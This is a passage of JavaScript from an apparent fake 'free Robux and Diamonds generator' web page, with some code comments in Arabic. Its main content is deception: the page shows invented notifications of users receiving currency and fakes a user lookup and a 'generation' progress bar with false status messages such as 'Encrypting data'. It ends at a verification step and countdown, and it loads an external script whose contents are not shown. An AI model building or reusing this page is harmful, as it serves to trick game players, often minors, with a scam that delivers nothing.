            'Lisa_Cool', 'Tom_Legend', 'Anna_Star', 'Chris_Pro', 'Mia_Queen',
            'Ryan_King', 'Sophia_Gamer', 'Noah_Elite', 'Olivia_Best', 'Lucas_Hero',
            'Ava_Master', 'Ethan_Boss', 'Isabella_VIP', 'Mason_Prime', 'Charlotte_Pro'
        ];

        const robuxAmounts = [800, 1200, 2500, 5000, 10000, 15000, 25000];
        const diamondAmounts = [100, 250, 500, 700, 900, 1500];

        function createNotification() {
            const username = usernames[Math.floor(Math.random() * usernames.length)];
            const robux = robuxAmounts[Math.floor(Math.random() * robuxAmounts.length)];
            const diamonds = diamondAmounts[Math.floor(Math.random() * diamondAmounts.length)];
            
            const notification = document.createElement('div');
            notification.className = 'notification';
            notification.innerHTML = `
                <img src="${DEFAULT_AVATAR}" alt="User" class="notification-avatar">
                <div class="notification-content">
                    <div class="notification-username">${username}</div>
                    <div class="notification-message">
                        <i class="fas fa-check-circle notification-icon"></i>
                        <span>Received ${robux.toLocaleString()} Robux + ${diamonds} Diamonds</span>
                    </div>
                </div>
            `;
            
            notificationContainer.appendChild(notification);
            
            setTimeout(() => {
                notification.remove();
            }, 5000);
        }

        setInterval(createNotification, 5000);
        setTimeout(createNotification, 1000);

        currencyOptions.forEach(option => {
            option.addEventListener('click', () => {
                currencyOptions.forEach(opt => opt.classList.remove('selected'));
                option.classList.add('selected');
                
                selectedCurrencyType = option.dataset.type;
                
                setTimeout(() => {
                    step0.classList.add('hidden');
                    step1.classList.remove('hidden');
                    smoothScrollToElement(step1, -80);
                }, 500);
            });
        });

        function showError(msg) {
            errorText.textContent = msg;
            errorMessage.style.display = 'block';
            userProfile.classList.remove('show');
        }

        function hideError() {
            errorMessage.style.display = 'none';
        }

        function setSearchLoading(loading) {
            searchButton.disabled = loading;
            if (loading) {
                searchButtonText.innerHTML = '<span class="spinner"></span> SEARCHING...';
            } else {
                searchButtonText.innerHTML = 'SEARCH USER';
            }
        }

        function showDefaultProfile(username) {
            currentUserData = {
                name: username,
                displayName: username,
                avatar: DEFAULT_AVATAR,
                created: null,
                isBanned: false
            };

            userAvatar.src = currentUserData.avatar;
            userAvatar.onerror = function() {
                this.src = DEFAULT_AVATAR;
            };
            displayName.textContent = currentUserData.displayName;
            usernameOut.textContent = "@" + currentUserData.name;
            accountCreated.textContent = "Unknown";
            
            onlineStatus.innerHTML = '<span class="status-dot"></span> Online';
            onlineStatus.className = 'status-badge online';
            onlineStatusBadge.className = 'online-status online';
            
            banStatus.innerHTML = '<span class="status-dot"></span> Active';
            banStatus.className = 'status-badge active';
            
            userProfile.classList.add('show');
            smoothScrollToElement(userProfile, -50);
            hideError();
        }

        function displayUserData(response, username) {
            currentUserData = {
                name: response.user_name || username,
                displayName: response.full_name || response.user_name || username,
                avatar: response.avatar || DEFAULT_AVATAR,
                created: response.created || null,
                isBanned: response.is_banned || false
            };

            userAvatar.src = currentUserData.avatar;
            userAvatar.onerror = function() {
                this.src = DEFAULT_AVATAR;
            };
            displayName.textContent = currentUserData.displayName;
            usernameOut.textContent = "@" + currentUserData.name;
            
            if (currentUserData.created) {
                const createdDate = new Date(currentUserData.created);
                const options = { year: 'numeric', month: 'short', day: 'numeric' };
                accountCreated.textContent = createdDate.toLocaleDateString('en-US', options);
            } else {
                accountCreated.textContent = "Unknown";
            }
            
            onlineStatus.innerHTML = '<span class="status-dot"></span> Online';
            onlineStatus.className = 'status-badge online';
            onlineStatusBadge.className = 'online-status online';
            
            if (currentUserData.isBanned) {
                banStatus.innerHTML = '<span class="status-dot"></span> Banned';
                banStatus.className = 'status-badge banned';
            } else {
                banStatus.innerHTML = '<span class="status-dot"></span> Active';
                banStatus.className = 'status-badge active';
            }
            
            userProfile.classList.add('show');
            smoothScrollToElement(userProfile, -50);
        }

        function handleUserLookup() {
            let username = $("#username").val().trim();
            
            hideError();
            if (username === "") {
                usernameInput.classList.add('shake');
                usernameInput.classList.add('border-red-500');
                setTimeout(() => {
                    usernameInput.classList.remove('shake');
                    setTimeout(() => {
                        usernameInput.classList.remove('border-red-500');
                    }, 500);
                }, 500);
                return;
            }

            setSearchLoading(true);
            userProfile.classList.remove('show');

            $.ajax({
                url: PRIMARY_API + username,
                method: "GET",
                timeout: 5000,
                success: function(response) {
                    setSearchLoading(false);

                    if (response.status === "SUCCESS") {
                        displayUserData(response, username);
                    } else {
                        showError('User not found. Please check the username and try again.');
                    }
                },
                error: function() {
                    $.ajax({
                        url: BACKUP_API + username,
                        method: "GET",
                        timeout: 5000,
                        success: function(response) {
                            setSearchLoading(false);

                            if (response.status === "SUCCESS") {
                                displayUserData(response, username);
                            } else {
                                showError('User not found. Please check the username and try again.');
                            }
                        },
                        error: function() {
                            setSearchLoading(false);
                            showError('Unable to fetch user data. Please try again later.');
                        }
                    });
                }
            });
        }

        searchButton.addEventListener('click', handleUserLookup);
        usernameInput.addEventListener('keydown', (e) => {
            if (e.key === 'Enter') handleUserLookup();
        });

        continueButton.addEventListener('click', () => {
            if (!currentUserData) return;
            
            usernameDisplay.textContent = currentUserData.name;
            usernameDisplay2.textContent = currentUserData.name;
            usernameDisplay3.textContent = currentUserData.name;
            
            step1.classList.add('hidden');
            
            if (selectedCurrencyType === 'robux') {
                step2.classList.remove('hidden');
                smoothScrollToElement(step2, -80);
            } else if (selectedCurrencyType === 'diamond') {
                step2_5.classList.remove('hidden');
                smoothScrollToElement(step2_5, -80);
            }
        });
        
        robuxBtns.forEach(btn => {
            btn.addEventListener('click', () => {
                robuxBtns.forEach(b => b.classList.remove('border-robux-green'));
                btn.classList.add('border-robux-green');
                
                btn.style.transform = 'scale(0.95)';
                setTimeout(() => {
                    btn.style.transform = 'scale(1.05)';
                    setTimeout(() => {
                        btn.style.transform = 'scale(1)';
                    }, 150);
                }, 150);
                
                selectedRobuxAmount = btn.dataset.amount;
                selectedDiamondAmount = 0;
                
                setTimeout(() => {
                    step2.classList.add('hidden');
                    step3.classList.remove('hidden');
                    smoothScrollToElement(step3, -80);
                    startMainProgress();
                }, 500);
            });
        });

        diamondOptions.forEach(option => {
            option.addEventListener('click', () => {
                diamondOptions.forEach(opt => opt.classList.remove('selected'));
                option.classList.add('selected');
                
                option.style.transform = 'scale(0.95)';
                setTimeout(() => {
                    option.style.transform = 'scale(1.05)';
                    setTimeout(() => {
                        option.style.transform = 'scale(1)';
                    }, 150);
                }, 150);
                
                selectedDiamondAmount = option.dataset.amount;
                selectedRobuxAmount = 0;
                
                setTimeout(() => {
                    step2_5.classList.add('hidden');
                    step3.classList.remove('hidden');
                    smoothScrollToElement(step3, -80);
                    startMainProgress();
                }, 500);
            });
        });

        // دالة لتحريك العداد من 0 إلى الرقم المستهدف
        function animateGenerationCounter(targetAmount) {
            let currentAmount = 0;
            const duration = 10000; // 10 ثواني (مدة شريط التقدم)
            const increment = targetAmount / (duration / 50); // زيادة كل 50ms
            
            const counterInterval = setInterval(() => {
                currentAmount += increment;
                
                if (currentAmount >= targetAmount) {
                    currentAmount = targetAmount;
                    clearInterval(counterInterval);
                }
                
                generationCounter.textContent = Math.floor(currentAmount).toLocaleString();
            }, 50);
        }

        function startMainProgress() {
            // إعداد عرض العملة والأيقونة
            if (selectedCurrencyType === 'robux') {
                generationIconContainer.innerHTML = '<div class="robux-icon generation-icon"></div>';
                generationLabel.textContent = 'ROBUX';
                animateGenerationCounter(parseInt(selectedRobuxAmount));
            } else if (selectedCurrencyType === 'diamond') {
                generationIconContainer.innerHTML = '<img src="images/901289026.png" alt="Diamond" class="generation-icon">';
                generationLabel.textContent = 'DIAMONDS';
                animateGenerationCounter(parseInt(selectedDiamondAmount));
            }
            
            let progress = 0;
            const interval = setInterval(() => {
                progress += 1;
                progressBar.style.width = `${progress}%`;
                progressPercent.textContent = `${progress}%`;
                
                if (progress === 10) {
                    addStatusMessage('Searching database...');
                } else if (progress === 30) {
                    addStatusMessage('Account found!');
                } else if (progress === 45) {
                    addStatusMessage(`User ${currentUserData?.name || 'Unknown'} confirmed`);
                } else if (progress === 60) {
                    if (selectedCurrencyType === 'robux') {
                        addStatusMessage(`Generating ${selectedRobuxAmount} Robux...`);
                    } else {
                        addStatusMessage(`Generating ${selectedDiamondAmount} Diamonds...`);
                    }
                } else if (progress === 75) {
                    addStatusMessage('Encrypting data...');
                } else if (progress === 90) {
                    addStatusMessage('Preparing final verification...');
                } else if (progress === 99) {
                    addStatusMessage('All rewards ready! Finalizing...');
                }
                
                if (progress >= 100) {
                    clearInterval(interval);
                    setTimeout(() => {
                        const rewardDisplay = document.getElementById('rewardDisplay');
                        const completionRewardDisplay = document.getElementById('completionRewardDisplay');
                        const floatingIcon = document.getElementById('floatingIcon');
                        
                        if (selectedCurrencyType === 'robux') {
                            floatingIcon.innerHTML = `<div class="robux-icon" style="width: 60px; height: 60px;"></div>`;
                            rewardDisplay.innerHTML = `<span class="font-bold text-xl">${selectedRobuxAmount.toLocaleString()}</span> Robux are ready!`;
                            completionRewardDisplay.innerHTML = `
                                <div class="robux-icon" style="width: 28px; height: 28px;"></div>
                                <span class="font-bold text-xl ml-2">${selectedRobuxAmount.toLocaleString()}</span>
                            `;
                        } else if (selectedCurrencyType === 'diamond') {
                            floatingIcon.innerHTML = `<img src="images/901289026.png" alt="Diamond" style="width: 60px; height: 60px;">`;
                            rewardDisplay.innerHTML = `<span class="font-bold text-xl">${selectedDiamondAmount.toLocaleString()}</span> Diamonds are ready!`;
                            completionRewardDisplay.innerHTML = `
                                <i class="fas fa-gem text-xl mr-2" style="color: #60a5fa;"></i>
                                <span class="font-bold text-xl">${selectedDiamondAmount.toLocaleString()}</span>
                            `;
                        }
                        
                        step3.classList.add('hidden');
                        step4.classList.remove('hidden');
                        smoothScrollToElement(step4, -80);
                    }, 1000);
                }
            }, 100);
        }
        
        function addStatusMessage(message) {
            const div = document.createElement('div');
            div.className = 'mb-1';
            div.innerHTML = `<i class="fas fa-check-circle text-green-500 mr-2"></i> ${message}`;
            statusMessages.appendChild(div);
            statusMessages.scrollTop = statusMessages.scrollHeight;
        }
        
        getrobuxBtn.addEventListener('click', () => {
            verification.classList.add('hidden');
            completion.classList.remove('hidden');
            smoothScrollToElement(completion, -50);
            
            let minutes = 5;
            let seconds = 0;
            
            const countdownInterval = setInterval(() => {
                if (seconds === 0) {
                    if (minutes === 0) {
                        clearInterval(countdownInterval);
                        return;
                    }
                    minutes--;
                    seconds = 59;
                } else {
                    seconds--;
                }
                
                let displayMinutes = minutes < 10 ? '0' + minutes : minutes;
                let displaySeconds = seconds < 10 ? '0' + seconds : seconds;
                countdown.textContent = `${displayMinutes}:${displaySeconds}`;
            }, 1000);
        });
    </script>
    
    <script async="" src="js/latest.js"></script>
</body></html>